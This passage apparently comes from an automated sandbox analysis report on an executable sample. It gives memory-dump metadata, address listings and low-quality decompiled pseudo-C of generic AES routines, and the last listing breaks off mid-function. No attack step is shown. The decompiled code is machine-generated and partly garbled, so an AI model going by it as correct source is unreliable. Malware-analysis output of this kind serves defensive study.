                                                              0x00b9b65c
                                                              0x00b9b661
                                                              0x00b9b667
                                                              0x00b9b66c
                                                              0x00b9b672
                                                              0x00b9b677
                                                              0x00b9b67d
                                                              0x00b9b682
                                                              0x00b9b688
                                                              0x00b9b68d
                                                              0x00b9b693
                                                              0x00b9b698
                                                              0x00b9b69e
                                                              0x00b9b6a3
                                                              0x00b9b6a9
                                                              0x00b9b6ae
                                                              0x00b9b6b4
                                                              0x00b9b6b9
                                                              0x00b9b6bf
                                                              0x00b9b6c4
                                                              0x00b9b6ca
                                                              0x00b9b6cf
                                                              0x00b9b6d2
                                                              0x00b9b6d5
                                                              0x00000000
                                                              0x00b9b302
                                                              0x00b9b308
                                                              0x00b9b4b0
                                                              0x00b9b4bb
                                                              0x00b9b5a0
                                                              0x00b9b5a5
                                                              0x00b9b5aa
                                                              0x00b9b5af
                                                              0x00b9b5b4
                                                              0x00b9b5b4
                                                              0x00b9b5b8
                                                              0x00b9b5bc
                                                              0x00b9b5c1
                                                              0x00b9b5c6
                                                              0x00b9b5cb
                                                              0x00b9b5ce
                                                              0x00b9b5d2
                                                              0x00b9b5d7
                                                              0x00b9b5db
                                                              0x00b9b5e0
                                                              0x00b9b5e4
                                                              0x00b9b5e9
                                                              0x00b9b5ed
                                                              0x00b9b5f2
                                                              0x00b9b5f6
                                                              0x00b9b5fb
                                                              0x00b9b5ff
                                                              0x00b9b603
                                                              0x00b9b607
                                                              0x00b9b60c
                                                              0x00b9b60c
                                                              0x00b9b618
                                                              0x00b9b4c1
                                                              0x00b9b4c6
                                                              0x00b9b4ca
                                                              0x00b9b4d0
                                                              0x00b9b4d5
                                                              0x00b9b4db
                                                              0x00b9b4e0
                                                              0x00b9b4e6
                                                              0x00b9b4eb
                                                              0x00b9b4f1
                                                              0x00b9b4f6
                                                              0x00b9b4fc
                                                              0x00b9b501
                                                              0x00b9b507
                                                              0x00b9b50c
                                                              0x00b9b512
                                                              0x00b9b517
                                                              0x00b9b51d
                                                              0x00b9b522
                                                              0x00b9b525
                                                              0x00b9b525
                                                              0x00000000
                                                              0x00b9b30e
                                                              0x00b9b314
                                                              0x00b9b7e8
                                                              0x00b9b7f3
                                                              0x00b9b320
                                                              0x00b9b326
                                                              0x00b9b3d0
                                                              0x00b9b3d4
                                                              0x00b9b3d9
                                                              0x00b9b3de
                                                              0x00b9b3e2
                                                              0x00b9b3e7
                                                              0x00b9b3e7
                                                              0x00b9b3ec
                                                              0x00b9b3f1
                                                              0x00b9b3f6
                                                              0x00b9b3f9
                                                              0x00b9b3fd
                                                              0x00b9b402
                                                              0x00b9b406
                                                              0x00b9b40b
                                                              0x00b9b40f
                                                              0x00b9b414
                                                              0x00b9b418
                                                              0x00b9b41c
                                                              0x00b9b421
                                                              0x00b9b425
                                                              0x00b9b425
                                                              0x00b9b42c
                                                              0x00b9b431
                                                              0x00b9b436
                                                              0x00b9b43b
                                                              0x00b9b440
                                                              0x00b9b444
                                                              0x00b9b449
                                                              0x00b9b44d
                                                              0x00b9b452
                                                              0x00b9b456
                                                              0x00b9b45b
                                                              0x00b9b45f
                                                              0x00b9b463
                                                              0x00b9b467
                                                              0x00b9b46b
                                                              0x00b9b470
                                                              0x00b9b475
                                                              0x00b9b479
                                                              0x00b9b47e
                                                              0x00b9b482
                                                              0x00b9b487
                                                              0x00b9b48b
                                                              0x00b9b490
                                                              0x00b9b494
                                                              0x00b9b498
                                                              0x00b9b4a2
                                                              0x00b9b32c
                                                              0x00b9b331
                                                              0x00b9b335
                                                              0x00b9b33b
                                                              0x00b9b340
                                                              0x00b9b346
                                                              0x00b9b34b
                                                              0x00b9b351
                                                              0x00b9b356
                                                              0x00b9b35c
                                                              0x00b9b361
                                                              0x00b9b367
                                                              0x00b9b36c
                                                              0x00b9b372
                                                              0x00b9b377
                                                              0x00b9b37d
                                                              0x00b9b382
                                                              0x00b9b388
                                                              0x00b9b38d
                                                              0x00b9b393
                                                              0x00b9b398
                                                              0x00b9b39e
                                                              0x00b9b3a3
                                                              0x00b9b3a6
                                                              0x00b9b3a6
                                                              0x00b9b7c3
                                                              0x00b9b7c3
                                                              0x00b9b7c7
                                                              0x00b9b7cb
                                                              0x00b9b7cf
                                                              0x00b9b7d3
                                                              0x00b9b7d7
                                                              0x00b9b7df
                                                              0x00b9b7df
                                                              0x00b9b314
                                                              0x00b9b308

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 18486c4e979394316ed11698c54234db91c0dea15fde20e6480289eb3a4aa722
                                                              • Instruction ID: 96a48465d7be607e89c96c8de6bd858a09f41542636ca3e5b33aa5020f826791
                                                              • Opcode Fuzzy Hash: 18486c4e979394316ed11698c54234db91c0dea15fde20e6480289eb3a4aa722
                                                              • Instruction Fuzzy Hash: 02A1E021C09F9946FB077B755153660E330AFF3244F10CBA7FDA178967EB61B6885220
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00B9AF30, Relevance: .2, Instructions: 232COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 28%
                                                              			E00B9AF30(void* _a4, void* _a8, int _a12, intOrPtr _a16, void* _a20, intOrPtr _a24) {
				intOrPtr _v0;
				int _t28;
				signed int _t29;
				void* _t30;
				void* _t31;
				void* _t32;
				void* _t33;
				void* _t34;
				void* _t35;
				void* _t36;
				void* _t37;
				void* _t39;
				void* _t42;
				intOrPtr _t44;
				intOrPtr _t45;
				int _t49;
				intOrPtr _t54;
				void* _t55;
				void* _t56;
				void* _t57;
				void* _t61;
				void* _t63;
				intOrPtr _t66;
				intOrPtr _t68;
				void* _t69;

				_t63 = _a4;
				_t57 = _a8;
				_t28 = _a12;
				_t42 = _t68 - 0x00000018 & 0xfffffff0;
				_t54 = _a16;
				if(_t28 == 0) {
					return _t28;
				}
				_t69 = _t42;
				asm("movups xmm7, [ebp]");
				_t45 =  *((intOrPtr*)(_t54 + 0xf0));
				_t66 = _t54;
				_v0 = _t68;
				_t44 = _t45;
				if(_a24 == 0) {
					if(_t28 <= 0x50) {
						L16:
						asm("movups xmm2, [esi]");
						asm("movaps xmm6, xmm2");
						if(_t28 <= 0x10) {
							asm("movups xmm0, [edx]");
							asm("movups xmm1, [edx+0x10]");
							_t55 = _t54 + 0x20;
							asm("xorps xmm2, xmm0");
							do {
								asm("aesdec xmm2, xmm1");
								_t45 = _t45 - 1;
								asm("movups xmm1, [edx]");
								_t22 = _t55 + 0x10; // 0xcccccccc
								_t55 = _t22;
							} while (_t45 != 0);
							asm("aesdeclast xmm2, xmm1");
							asm("xorps xmm2, xmm7");
							asm("movaps xmm7, xmm6");
							_t29 = _t28 - 0x10;
							goto L28;
						}
						asm("movups xmm3, [esi+0x10]");
						asm("movaps xmm5, xmm3");
						if(_t28 <= 0x20) {
							_t31 = E00B98880(_t28, _t45, _t54);
							asm("xorps xmm2, xmm7");
							asm("xorps xmm3, xmm6");
							asm("movups [edi], xmm2");
							asm("movaps xmm2, xmm3");
							asm("pxor xmm3, xmm3");
							_t57 = _t57 + 0x10;
							asm("movaps xmm7, xmm5");
							_t29 = _t31 - 0x20;
						} else {
							asm("movups xmm4, [esi+0x20]");
							if(_t28 <= 0x30) {
								_t32 = E00B98960(_t28, _t45, _t54);
								asm("xorps xmm2, xmm7");
								asm("xorps xmm3, xmm6");
								asm("xorps xmm4, xmm5");
								asm("movups [edi], xmm2");
								asm("movaps xmm2, xmm4");
								asm("pxor xmm4, xmm4");
								asm("movups [edi+0x10], xmm3");
								asm("pxor xmm3, xmm3");
								_t57 = _t57 + 0x20;
								asm("movups xmm7, [esi+0x20]");
								_t29 = _t32 - 0x30;
							} else {
								asm("movups xmm5, [esi+0x30]");
								if(_t28 <= 0x40) {
									_t33 = E00B98A70(_t28, _t45, _t54);
									asm("movups xmm1, [esi+0x10]");
									asm("movups xmm0, [esi+0x20]");
									asm("xorps xmm2, xmm7");
									asm("movups xmm7, [esi+0x30]");
									asm("xorps xmm3, xmm6");
									asm("movups [edi], xmm2");
									asm("xorps xmm4, xmm1");
									asm("movups [edi+0x10], xmm3");
									asm("pxor xmm3, xmm3");
									asm("xorps xmm5, xmm0");
									asm("movups [edi+0x20], xmm4");
									asm("pxor xmm4, xmm4");
									_t57 = _t57 + 0x30;
									asm("movaps xmm2, xmm5");
									asm("pxor xmm5, xmm5");
									_t29 = _t33 - 0x40;
								} else {
									asm("movups xmm6, [esi+0x40]");
									asm("movaps [esp], xmm7");
									asm("movups xmm2, [esi]");
									asm("xorps xmm7, xmm7");
									_t34 = E00B98BE0(_t28, _t45, _t54);
									asm("movups xmm1, [esi]");
									asm("movups xmm0, [esi+0x10]");
									asm("xorps xmm2, [esp]");
									asm("xorps xmm3, xmm1");
									asm("movups xmm1, [esi+0x20]");
									asm("xorps xmm4, xmm0");
									asm("movups xmm0, [esi+0x30]");
									asm("xorps xmm5, xmm1");
									asm("movups xmm7, [esi+0x40]");
									asm("xorps xmm6, xmm0");
									asm("movups [edi], xmm2");
									asm("movups [edi+0x10], xmm3");
									asm("pxor xmm3, xmm3");
									asm("movups [edi+0x20], xmm4");
									asm("pxor xmm4, xmm4");
									asm("movups [edi+0x30], xmm5");
									asm("pxor xmm5, xmm5");
									_t57 = _t57 + 0x40;
									asm("movaps xmm2, xmm6");
									asm("pxor xmm6, xmm6");
									_t29 = _t34 - 0x50;
								}
							}
						}
						goto L28;
					} else {
						asm("movaps [esp], xmm7");
						_t35 = _t28 - 0x50;
						while(1) {
							asm("movdqu xmm2, [esi]");
							asm("movdqu xmm3, [esi+0x10]");
							asm("movdqu xmm4, [esi+0x20]");
							asm("movdqu xmm5, [esi+0x30]");
							asm("movdqu xmm6, [esi+0x40]");
							asm("movdqu xmm7, [esi+0x50]");
							_t36 = E00B98BE0(_t35, _t45, _t54);
							asm("movups xmm1, [esi]");
							asm("movups xmm0, [esi+0x10]");
							asm("xorps xmm2, [esp]");
							asm("xorps xmm3, xmm1");
							asm("movups xmm1, [esi+0x20]");
							asm("xorps xmm4, xmm0");
							asm("movups xmm0, [esi+0x30]");
							asm("xorps xmm5, xmm1");
							asm("movups xmm1, [esi+0x40]");
							asm("xorps xmm6, xmm0");
							asm("movups xmm0, [esi+0x50]");
							asm("xorps xmm7, xmm1");
							asm("movups [edi], xmm2");
							asm("movups [edi+0x10], xmm3");
							_t17 = _t63 + 0x60; // 0xcccccccc
							_t63 = _t17;
							asm("movups [edi+0x20], xmm4");
							_t45 = _t44;
							asm("movups [edi+0x30], xmm5");
							_t54 = _t66;
							asm("movups [edi+0x40], xmm6");
							_t57 = _t57 + 0x50;
							_t35 = _t36 - 0x60;
							if(_t35 <= 0) {
								break;
							}
							asm("movaps [esp], xmm0");
							asm("movups [edi], xmm7");
							_t57 = _t57 + 0x10;
						}
						asm("movaps xmm2, xmm7");
						asm("movaps xmm7, xmm0");
						_t29 = _t35 + 0x50;
						if(_t29 <= 0) {
							asm("pxor xmm3, xmm3");
							asm("pxor xmm4, xmm4");
							asm("pxor xmm5, xmm5");
							asm("pxor xmm6, xmm6");
							L28:
							_t30 = _t29 & 0x0000000f;
							if(_t30 != 0) {
								asm("movaps [esp], xmm2");
								asm("pxor xmm0, xmm0");
								_t30 = memcpy(_t57, _t69, 0x10);
								asm("movdqa [esp], xmm2");
							} else {
								asm("movups [edi], xmm2");
								asm("pxor xmm0, xmm0");
							}
							L31:
							asm("pxor xmm2, xmm2");
							asm("pxor xmm1, xmm1");
							asm("movups [ebp], xmm7");
							asm("pxor xmm7, xmm7");
							return _t30;
						}
						asm("movups [edi], xmm2");
						_t57 = _t57 + 0x10;
						goto L16;
					}
				}
				asm("movaps xmm2, xmm7");
				if(_t28 < 0x10) {
					L9:
					_t49 = _t28;
					_t37 = memcpy(_t57, _t63, _t49);
					_t61 = _t63 + _t49 + _t49;
					_t39 = memset(_t61, 0, 0x10 << 0);
					_t69 = _t69 + 0x18;
					_t57 = _t61 + 0x10 - _t37 - 0x10;
					_t45 = _t44;
					_t63 = _t57;
					_t54 = _t66;
					goto L4;
				} else {
					_t39 = _t28 - 0x10;
					do {
						L4:
						asm("movups xmm7, [esi]");
						_t10 = _t63 + 0x10; // 0xcccccccc
						_t63 = _t10;
						asm("movups xmm0, [edx]");
						asm("movups xmm1, [edx+0x10]");
						asm("xorps xmm7, xmm0");
						_t56 = _t54 + 0x20;
						asm("xorps xmm2, xmm7");
						do {
							asm("aesenc xmm2, xmm1");
							_t45 = _t45 - 1;
							asm("movups xmm1, [edx]");
							_t12 = _t56 + 0x10; // 0xcccccccc
							_t56 = _t12;
						} while (_t45 != 0);
						asm("aesenclast xmm2, xmm1");
						_t45 = _t44;
						_t54 = _t66;
						asm("movups [edi], xmm2");
						_t57 = _t57 + 0x10;
						_t39 = _t39 - 0x10;
					} while (_t39 >= 0);
					_t28 = _t39 + 0x10;
					if(_t28 != 0) {
						goto L9;
					} else {
						asm("movaps xmm7, xmm2");
						asm("pxor xmm2, xmm2");
						goto L31;
					}
				}
			}




























                                                              0x00b9af34
                                                              0x00b9af3a
                                                              0x00b9af41
                                                              0x00b9af45
                                                              0x00b9af48
                                                              0x00b9af52
                                                              0x00b9b2b6
                                                              0x00b9b2b6
                                                              0x00b9af5d
                                                              0x00b9af5f
                                                              0x00b9af63
                                                              0x00b9af69
                                                              0x00b9af6b
                                                              0x00b9af6f
                                                              0x00b9af71
                                                              0x00b9b013
                                                              0x00b9b0c1
                                                              0x00b9b0c1
                                                              0x00b9b0c4
                                                              0x00b9b0ca
                                                              0x00b9b160
                                                              0x00b9b163
                                                              0x00b9b167
                                                              0x00b9b16a
                                                              0x00b9b16d
                                                              0x00b9b16d
                                                              0x00b9b172
                                                              0x00b9b173
                                                              0x00b9b176
                                                              0x00b9b176
                                                              0x00b9b176
                                                              0x00b9b17f
                                                              0x00b9b184
                                                              0x00b9b187
                                                              0x00b9b18a
                                                              0x00000000
                                                              0x00b9b18a
                                                              0x00b9b0d0
                                                              0x00b9b0d4
                                                              0x00b9b0da
                                                              0x00b9b1a0
                                                              0x00b9b1a5
                                                              0x00b9b1a8
                                                              0x00b9b1ab
                                                              0x00b9b1ae
                                                              0x00b9b1b1
                                                              0x00b9b1b5
                                                              0x00b9b1b8
                                                              0x00b9b1bb
                                                              0x00b9b0e0
                                                              0x00b9b0e0
                                                              0x00b9b0e7
                                                              0x00b9b1d0
                                                              0x00b9b1d5
                                                              0x00b9b1d8
                                                              0x00b9b1db
                                                              0x00b9b1de
                                                              0x00b9b1e1
                                                              0x00b9b1e4
                                                              0x00b9b1e8
                                                              0x00b9b1ec
                                                              0x00b9b1f0
                                                              0x00b9b1f3
                                                              0x00b9b1f7
                                                              0x00b9b0ed
                                                              0x00b9b0ed
                                                              0x00b9b0f4
                                                              0x00b9b200
                                                              0x00b9b205
                                                              0x00b9b209
                                                              0x00b9b20d
                                                              0x00b9b210
                                                              0x00b9b214
                                                              0x00b9b217
                                                              0x00b9b21a
                                                              0x00b9b21d
                                                              0x00b9b221
                                                              0x00b9b225
                                                              0x00b9b228
                                                              0x00b9b22c
                                                              0x00b9b230
                                                              0x00b9b233
                                                              0x00b9b236
                                                              0x00b9b23a
                                                              0x00b9b0fa
                                                              0x00b9b0fa
                                                              0x00b9b0fe
                                                              0x00b9b102
                                                              0x00b9b105
                                                              0x00b9b108
                                                              0x00b9b10d
                                                              0x00b9b110
                                                              0x00b9b114
                                                              0x00b9b118
                                                              0x00b9b11b
                                                              0x00b9b11f
                                                              0x00b9b122
                                                              0x00b9b126
                                                              0x00b9b129
                                                              0x00b9b12d
                                                              0x00b9b130
                                                              0x00b9b133
                                                              0x00b9b137
                                                              0x00b9b13b
                                                              0x00b9b13f
                                                              0x00b9b143
                                                              0x00b9b147
                                                              0x00b9b14b
                                                              0x00b9b14e
                                                              0x00b9b151
                                                              0x00b9b155
                                                              0x00b9b155
                                                              0x00b9b0f4
                                                              0x00b9b0e7
                                                              0x00000000
                                                              0x00b9b019
                                                              0x00b9b019
                                                              0x00b9b01d
                                                              0x00b9b03a
                                                              0x00b9b03a
                                                              0x00b9b03e
                                                              0x00b9b043
                                                              0x00b9b048
                                                              0x00b9b04d
                                                              0x00b9b052
                                                              0x00b9b057
                                                              0x00b9b05c
                                                              0x00b9b05f
                                                              0x00b9b063
                                                              0x00b9b067
                                                              0x00b9b06a
                                                              0x00b9b06e
                                                              0x00b9b071
                                                              0x00b9b075
                                                              0x00b9b078
                                                              0x00b9b07c
                                                              0x00b9b07f
                                                              0x00b9b083
                                                              0x00b9b086
                                                              0x00b9b089
                                                              0x00b9b08d
                                                              0x00b9b08d
                                                              0x00b9b090
                                                              0x00b9b094
                                                              0x00b9b096
                                                              0x00b9b09a
                                                              0x00b9b09c
                                                              0x00b9b0a0
                                                              0x00b9b0a3
                                                              0x00b9b0a6
                                                              0x00000000
                                                              0x00000000
                                                              0x00b9b030
                                                              0x00b9b034
                                                              0x00b9b037
                                                              0x00b9b037
                                                              0x00b9b0ac
                                                              0x00b9b0af
                                                              0x00b9b0b2
                                                              0x00b9b0b5
                                                              0x00b9b250
                                                              0x00b9b254
                                                              0x00b9b258
                                                              0x00b9b25c
                                                              0x00b9b260
                                                              0x00b9b260
                                                              0x00b9b263
                                                              0x00b9b280
                                                              0x00b9b284
                                                              0x00b9b293
                                                              0x00b9b295
                                                              0x00b9b269
                                                              0x00b9b269
                                                              0x00b9b26c
                                                              0x00b9b26c
                                                              0x00b9b29a
                                                              0x00b9b2a2
                                                              0x00b9b2a6
                                                              0x00b9b2aa
                                                              0x00b9b2ae
                                                              0x00000000
                                                              0x00b9b2ae
                                                              0x00b9b0bb
                                                              0x00b9b0be
                                                              0x00000000
                                                              0x00b9b0be
                                                              0x00b9b013
                                                              0x00b9af77
                                                              0x00b9af7d
                                                              0x00b9afe5
                                                              0x00b9afe5
                                                              0x00b9afe9
                                                              0x00b9afe9
                                                              0x00b9aff6
                                                              0x00b9aff6
                                                              0x00b9aff8
                                                              0x00b9affb
                                                              0x00b9affd
                                                              0x00b9afff
                                                              0x00000000
                                                              0x00b9af83
                                                              0x00b9af83
                                                              0x00b9af90
                                                              0x00b9af90
                                                              0x00b9af90
                                                              0x00b9af93
                                                              0x00b9af93
                                                              0x00b9af96
                                                              0x00b9af99
                                                              0x00b9af9d
                                                              0x00b9afa0
                                                              0x00b9afa3
                                                              0x00b9afa6
                                                              0x00b9afa6
                                                              0x00b9afab
                                                              0x00b9afac
                                                              0x00b9afaf
                                                              0x00b9afaf
                                                              0x00b9afaf
                                                              0x00b9afb8
                                                              0x00b9afbd
                                                              0x00b9afbf
                                                              0x00b9afc1
                                                              0x00b9afc4
                                                              0x00b9afc7
                                                              0x00b9afc7
                                                              0x00b9afd0
                                                              0x00b9afd3
                                                              0x00000000
                                                              0x00b9afd9
                                                              0x00b9afd9
                                                              0x00b9afdc
                                                              0x00000000
                                                              0x00b9afdc
                                                              0x00b9afd3

                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.495437638.0000000000B91000.00000020.00020000.sdmp, Offset: 00B90000, based on PE: true
                                                              • Associated: 00000000.00000002.495421909.0000000000B90000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495560404.0000000000C80000.00000002.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495617724.0000000000CC1000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495636849.0000000000CC2000.00000008.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495653681.0000000000CC5000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495669555.0000000000CC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495696741.0000000000DC9000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495725492.0000000000ECA000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495741240.0000000000ECC000.00000004.00020000.sdmp Download File
                                                              • Associated: 00000000.00000002.495757375.0000000000ECE000.00000002.00020000.sdmp Download File
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 1c67d0a1af6e8a7f01c2d12470aae2a1adc6c6e898a60526834b0ff204231690
                                                              • Instruction ID: a4bf5a19082e14441ec482e53024efdb10fe50ab9724abd22fd957d4621c9519
                                                              • Opcode Fuzzy Hash: 1c67d0a1af6e8a7f01c2d12470aae2a1adc6c6e898a60526834b0ff204231690
                                                              • Instruction Fuzzy Hash: 9D91B810D1CF9D83E6129F3985411A7B7E0BEBE308B15DB5AEDD876822DB20B6D59280
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              Function 00BA17E0, Relevance: .2, Instructions: 226COMMONCrypto
                                                              Download Yara Rule
                                                              C-Code - Quality: 62%
                                                              			E00BA17E0(signed int* _a12) {
				void* _t46;
				signed int _t49;
				signed int _t66;
				signed int _t75;
				signed int _t78;
				signed int _t105;
				signed int _t108;
				signed int _t130;
				signed int _t133;
				intOrPtr* _t141;
				signed int* _t142;
				intOrPtr* _t145;

				_t46 = E00BA1500();
				if(_t46 == 0) {
					_t145 = _a12;
					_t141 = _t145 +  *(_t145 + 0xf0) * 4 * 4;
					do {
						 *_t141 =  *_t145;
						 *((intOrPtr*)(_t141 + 4)) =  *((intOrPtr*)(_t145 + 4));
						 *_t145 =  *_t141;
						 *((intOrPtr*)(_t145 + 4)) =  *((intOrPtr*)(_t141 + 4));
						 *((intOrPtr*)(_t141 + 8)) =  *((intOrPtr*)(_t145 + 8));
						 *((intOrPtr*)(_t141 + 0xc)) =  *((intOrPtr*)(_t145 + 0xc));
						 *((intOrPtr*)(_t145 + 8)) =  *((intOrPtr*)(_t141 + 8));
						 *((intOrPtr*)(_t145 + 0xc)) =  *((intOrPtr*)(_t141 + 0xc));
						_t145 = _t145 + 0x10;
						_t141 = _t141 - 0x10;
					} while (_t145 != _t141);
					_t142 = _a12;
					_a12 = _t142 + (_t142[0x3c] + _t142[0x3c] - 2) * 8;
					_t49 = _t142[4];
					do {
						_t142 =  &(_t142[4]);
						_t75 = _t49 + _t49 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t49) >> 0x00000007) & 0x1b1b1b1b;
						_t100 = _t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b;
						asm("rol eax, 0x8");
						asm("rol ebx, 0x18");
						asm("rol ecx, 0x10");
						asm("rol edx, 0x8");
						_t78 = _t142[1];
						 *_t142 = _t49 ^ _t75 ^ _t49 ^ _t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b ^ _t49 ^ (_t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b) + _t100 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t100) >> 0x00000007) & 0x1b1b1b1b ^ _t75 ^ _t49 ^ (_t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b) + _t100 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t100) >> 0x00000007) & 0x1b1b1b1b ^ _t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b ^ _t49 ^ (_t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b) + _t100 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t100) >> 0x00000007) & 0x1b1b1b1b ^ (_t75 + _t75 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t75) >> 0x00000007) & 0x1b1b1b1b) + _t100 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t100) >> 0x00000007) & 0x1b1b1b1b;
						_t105 = _t78 + _t78 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t78) >> 0x00000007) & 0x1b1b1b1b;
						_t125 = _t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b;
						asm("rol ebx, 0x8");
						asm("rol ecx, 0x18");
						asm("rol edx, 0x10");
						asm("rol eax, 0x8");
						_t108 = _t142[2];
						_t142[1] = _t78 ^ _t105 ^ _t78 ^ _t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b ^ _t78 ^ (_t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b) + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ _t105 ^ _t78 ^ (_t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b) + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ _t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b ^ _t78 ^ (_t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b) + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b ^ (_t105 + _t105 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t105) >> 0x00000007) & 0x1b1b1b1b) + _t125 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t125) >> 0x00000007) & 0x1b1b1b1b;
						_t130 = _t108 + _t108 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t108) >> 0x00000007) & 0x1b1b1b1b;
						_t61 = _t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b;
						asm("rol ecx, 0x8");
						asm("rol edx, 0x18");
						asm("rol eax, 0x10");
						asm("rol ebx, 0x8");
						_t133 = _t142[3];
						_t142[2] = _t108 ^ _t130 ^ _t108 ^ _t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b ^ _t108 ^ (_t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b) + _t61 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t61) >> 0x00000007) & 0x1b1b1b1b ^ _t130 ^ _t108 ^ (_t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b) + _t61 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t61) >> 0x00000007) & 0x1b1b1b1b ^ _t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b ^ _t108 ^ (_t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b) + _t61 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t61) >> 0x00000007) & 0x1b1b1b1b ^ (_t130 + _t130 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t130) >> 0x00000007) & 0x1b1b1b1b) + _t61 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t61) >> 0x00000007) & 0x1b1b1b1b;
						_t66 = _t133 + _t133 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t133) >> 0x00000007) & 0x1b1b1b1b;
						_t90 = _t66 + _t66 & 0xfefefefe ^ 0x80808080 - ((0x80808080 & _t66) >> 0x00000007) & 0x1b1b1b1b;
						asm("rol edx, 0x8");
						asm("rol eax, 0x18");
						asm("rol ebx, 0x10");
						asm("rol ecx, 0x8");
						_t49 = _t142[4];
